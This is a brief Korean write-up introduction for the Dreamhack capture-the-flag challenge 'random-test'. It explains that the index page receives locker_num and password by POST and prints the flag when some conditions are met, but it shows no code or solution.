[dreamhack] random-test 문제풀이

아래는 문제 코드이다.

index 페이지를 보면 locker_num과 password 변수를 받는다. (POST 방식으로 넘긴다.)

그리고, 아래의 조건문을 모두 만족하면 FLAG를 출력하는 간단한 문제다.
